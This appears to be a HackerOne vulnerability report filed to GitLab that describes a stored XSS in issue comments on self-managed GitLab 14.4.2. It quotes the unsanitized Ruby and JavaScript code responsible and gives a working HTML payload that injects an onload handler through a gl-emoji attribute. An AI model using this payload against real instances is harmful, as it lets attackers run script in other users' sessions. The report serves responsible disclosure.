Stored XSS on issue comments and other pages which contain notes
HackerOne report #1398305 by jarij
on 2021-11-11, assigned to @nmalcolm:
Report | Attachments | How To Reproduce
Report
Summary
This report contains two XSS sanitization bypasses:
- The SyntaxHighlightFilter creates html from unsanitized data. This can be used to bypass the XSS filter on the server-side.
def highlight_node(node)
...
sourcepos = node.parent.attr('data-sourcepos')
...
sourcepos_attr = sourcepos ? "data-sourcepos=\"#{sourcepos}\"" : ""
highlighted = %(<pre #{sourcepos_attr} class="#{css_classes}"
lang="#{language}"
#{lang_params}
v-pre="true"><code>#{code}</code></pre>)
- The gl-emoji custom element can be used to bypass the gitlab-ui
v-safe-html
directive sanitization on the frontend side by injecting the payload into the name attribute:
export function emojiImageTag(name, src) {
return `<img class="emoji" title=":${name}:" alt=":${name}:" src="${src}" width="20" height="20" align="absmiddle" />`;
}
- Gitlab SaaS is not vulnerable because this report does not include CSP bypass. I'm currently working on this.
Steps to reproduce
- Launch self-managed Gitlab instance
- Create issue
- Copy and paste the following payload into the comment field:
<pre data-sourcepos="" href="x"></pre>
<gl-emoji data-name='"x="y" onload="alert(document.location.href)"' data-unicode-version='x'>
abc
</gl-emoji>
<pre x="">
<code></code></pre>
Results of GitLab environment info
### gitlab-rake gitlab:env:info
System information
System:
Proxy: no
Current User: git
Using RVM: no
Ruby Version: 2.7.4p191
Gem Version: 3.1.4
Bundler Version:2.1.4
Rake Version: 13.0.6
Redis Version: 6.0.16
Git Version: 2.33.0.
Sidekiq Version:6.2.2
Go Version: unknown
GitLab information
Version: 14.4.2-ee
Revision: 84aa6daaffd
Directory: /opt/gitlab/embedded/service/gitlab-rails
DB Adapter: PostgreSQL
DB Version: 12.7
URL: http://localhost:8888
HTTP Clone URL: http://localhost:8888/some-group/some-project.git
SSH Clone URL: git@localhost:some-group/some-project.git
Elasticsearch: no
Geo: no
Using LDAP: no
Using Omniauth: yes
Omniauth Providers:
GitLab Shell
Version: 13.21.1
Repository storage paths:
- default: /var/opt/gitlab/git-data/repositories
GitLab Shell path: /opt/gitlab/embedded/service/gitlab-shell
Git: /opt/gitlab/embedded/bin/git
Impact
Attacker who can comment on issue will be able to XSS users that visit that issue. This also affects other pages where comments can be posted, such as snippets.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: